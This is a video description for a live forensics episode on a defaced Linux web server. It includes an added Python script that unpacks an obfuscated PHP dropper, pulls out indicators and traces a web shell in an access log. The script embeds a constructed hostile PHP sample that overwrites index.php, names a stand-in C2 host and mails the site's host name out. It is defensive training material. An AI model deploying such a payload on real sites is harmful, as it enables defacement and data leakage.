Incident Response Training, Live Forensics of Compromised Website

Continuing my Incident Response Training Series, today I am covering live forensics of a compromised website running on Linux, so this episode is also another video in my Linux Forensics Series.

Also, I am giving away a couple of VIP Coupons for Let's Defend Lab and Blue Team Lab Online. So watch the episode to participate and grab your chance!!

👉 I will show you what was changed on the server to make the actual website unreachable and display a bizarre message
👉 I will decode the full obfuscated code and identify the IOCs
👉 Analyze logs to identify how the attacker got into the server
👉 Run a self-made tool (Power Forensics) to capture volatile data from the server. I will make the tool open source once I complete the full project, so stay tuned for the next episodes
👉 Analyze the volatile data to identify more traces of the attacker
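Two of the steps above, decoding the obfuscated code to pull out IOCs and reading the access log to find where the attacker came in, can be scripted, and the script below is an added example of that: it is not code from the video or from the Power Forensics tool. Everything in it is constructed for the example: the defacement payload, the wrapper chain it peels off (base64_decode / gzinflate / str_rot13, an assumption about how such droppers are typically layered, not what was found on the ella.com server), the access log lines, and the addresses 198.51.100.23 and 203.0.113.x, which are documentation ranges. The last function ties the two halves together the way a responder would: an address that appears both inside the decoded payload and as a request source in the log is the strongest link between the defacement and the entry point.

```python
"""Added example (not code from the video or the Power Forensics tool):
scriptable versions of two steps from the episode outline. All sample
data below is constructed for the example."""
import base64
import codecs
import re
import zlib

# Constructed plaintext of a defacement payload: it overwrites index.php and
# refers to an address we will later look for as a source in the access log.
INNER_PHP = (
    '<?php $c2="http://198.51.100.23/update.txt"; '
    'file_put_contents("index.php", "<h1>Hacked by example</h1>"); '
    '@mail("ops@example.invalid", "pwned", $_SERVER["HTTP_HOST"]); ?>'
)

def _php_gzdeflate(data: bytes) -> bytes:
    """Raw DEFLATE with no zlib header, which is what PHP's gzdeflate() emits."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()

def build_sample_blob() -> str:
    """Wrap INNER_PHP the way layered droppers do: rot13 -> deflate -> base64 -> eval()."""
    rot = codecs.encode(INNER_PHP, "rot_13")
    b64 = base64.b64encode(_php_gzdeflate(rot.encode())).decode()
    return f'<?php eval(str_rot13(gzinflate(base64_decode("{b64}")))); ?>'

WRAPPER_RE = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
# Inverse of each PHP wrapper we know how to undo; extend as new ones turn up.
INVERSE = {
    "gzinflate": lambda d: zlib.decompress(d, -15),
    "gzuncompress": lambda d: zlib.decompress(d),
    "str_rot13": lambda d: codecs.encode(d.decode("latin-1"), "rot_13").encode("latin-1"),
}

def deobfuscate(php_src: str) -> str:
    """Undo the nested wrapper calls around a base64 blob, innermost first.
    Same idea as a CyberChef recipe, but the order is read from the source."""
    m = WRAPPER_RE.search(php_src)
    if not m:
        raise ValueError("no base64_decode(...) wrapper found")
    # Names of the calls enclosing base64_decode, outermost first,
    # e.g. ['eval', 'str_rot13', 'gzinflate'].
    chain = re.findall(r"(\w+)\(", php_src[: m.start()])
    data = base64.b64decode(m.group(1))
    for fn in reversed(chain):
        if fn == "eval":
            break  # eval would execute the result; we only want to read it
        if fn not in INVERSE:
            raise ValueError(f"unsupported wrapper: {fn}")
        data = INVERSE[fn](data)
    return data.decode("utf-8", errors="replace")

IOC_PATTERNS = {
    "url": re.compile(r'https?://[^\s"\'<>]+'),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
}

def extract_iocs(text: str) -> dict:
    """Pull URLs, IPv4 addresses and e-mail addresses out of decoded code."""
    return {name: sorted(set(p.findall(text))) for name, p in IOC_PATTERNS.items()}

# Constructed Apache combined-format access log (documentation IP ranges only).
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [12/Mar/2023:09:14:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2023:09:14:05 +0000] "GET /product?id=42 HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2023:09:20:11 +0000] "GET /wp-login.php HTTP/1.1" 200 2001 "-" "python-requests/2.28"
198.51.100.23 - - [12/Mar/2023:09:20:12 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.28"
198.51.100.23 - - [12/Mar/2023:09:21:40 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 71 "-" "python-requests/2.28"
198.51.100.23 - - [12/Mar/2023:09:21:52 +0000] "POST /wp-content/uploads/2023/03/cache.php HTTP/1.1" 200 15 "-" "python-requests/2.28"
203.0.113.9 - - [12/Mar/2023:09:30:00 +0000] "GET /index.php HTTP/1.1" 200 211 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

def find_entry_point(log_text: str) -> dict:
    """Pivot from a PHP file executed out of an upload directory back to
    everything its source IP did; that IP's first request is the entry candidate."""
    entries = [m.groupdict() for m in map(LOG_RE.match, log_text.splitlines()) if m]
    shell_hits = [e for e in entries if re.search(r"/uploads/.*\.php$", e["path"])]
    suspect_ips = sorted({e["ip"] for e in shell_hits})
    timeline = [e for e in entries if e["ip"] in suspect_ips]  # in log order
    return {
        "shell_hits": shell_hits,
        "suspect_ips": suspect_ips,
        "timeline": timeline,
        "first_contact": timeline[0] if timeline else None,
    }

def overlapping_ips(iocs: dict, triage: dict) -> list:
    """Addresses seen both inside the decoded payload and as a log source."""
    return sorted(set(iocs["ipv4"]) & set(triage["suspect_ips"]))
```

Run `deobfuscate(build_sample_blob())` to get the plaintext back, `extract_iocs` on that for the URL, address and mailbox, and `find_entry_point(SAMPLE_ACCESS_LOG)` to see that the only address which executed a PHP file under uploads first touched the login page a minute and a half earlier. On a real log the `/uploads/.*\.php` pattern is the part to adapt: it should match whatever path the changed file was found at during the file-system review, since that is the pivot the whole timeline hangs on.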

So it's a fully detailed analysis of a real SOC incident, with in-depth analysis. Whether you want to become a SOC analyst, want to work on real cyber incidents, or are an absolute beginner or an experienced professional, each of you should get something out of this episode in terms of learning, and also get an opportunity to earn the Forensics Certification Examination voucher!! So, watch the full episode and ROCK in SOC!!

Tools I have used in this Episode-
👉 CyberChef
👉 Volatility Memory Forensics
👉 Power Forensics
👉 SIFT Workstation
👉 ClamAV

Timelines
-------------------------------------------------------------------------------------------------------------------------
0:00 ⏩ Pretty sketchy stuff!
2:04 ⏩ Background
5:06 ⏩ What has happened
6:47 ⏩ Login to host and Start Analysis
15:55 ⏩ Decode the Malicious Code
28:40 ⏩ Analyze Access Logs
44:14 ⏩ Run Power Forensics
50:51 ⏩ Analyze Volatile Data
1:04:55 ⏩ Run ClamScan
1:06:54 ⏩ Recap Analysis
1:10:11 ⏩ Report from ClamScan
1:14:16 ⏩ Let's Summarize

📞📲
FOLLOW ME EVERYWHERE-
-------------------------------------------------------------------------------------------------------------------------
✔ Twitter: @blackperl_dfir

SUPPORT BLACKPERL
-------------------------------------------------------------------------------------------------------------------------
╔═╦╗╔╦╗╔═╦═╦╦╦╦╗╔═╗
║╚╣║║║╚╣╚╣╔╣╔╣║╚╣═╣
╠╗║╚╝║║╠╗║╚╣║║║║║═╣
╚═╩══╩═╩═╩═╩╝╚╩═╩═╝
➡️ SUBSCRIBE, Share, Like, Comment
-------------------------------------------------------------------------------------------------------------------------
🙏 Thanks for watching!! Be CyberAware!! 🤞
Comments

BlackPerl (channel author): This incident started when an e-commerce website, www.ella.com (name changed), was compromised and taken down by hackers! The business was completely down, as the website was the web portal for the company's shopping site. So, in this episode I will share with you each and every step that I performed to find out what/how/when. This is a live incident response and forensics episode where we will go deeper into Linux.
amoghnellutla: Informative and clear to the point, and participating in the giveaway

puneetkhandelwal: This is great! Looking forward to more such IR videos.

raghu: Amazing analysis, pls keep adding these kinds of videos.

arunrmyt: Please use the gf tool to search through the entire site repo and you will find things quicker. Great job. Real saviour.

Nick-snbl: Great content, keep up the good work!

Pancurek: Great video, can we get some Windows forensics? I take part in the raffle.

vaibhavchaturvedi: Participating in the giveaway, posted on LinkedIn. Thanks!!

Dexter_Ops: Usually we don't get how exploitation took place in web logs or IIS logs, please share your views on this as well.

RamaKrishna-lgzo: Can you please explain Windows forensic analysis investigation, sir?

ShantanuDeyAnik: Sir, I am participating in the giveaway. Already posted on LinkedIn. 😍

MoonSlayer: Sir, I am participating in the giveaway. Already posted on LinkedIn.

RamaKrishna-lgzo: Sir, I am participating in the giveaway. Already posted on LinkedIn.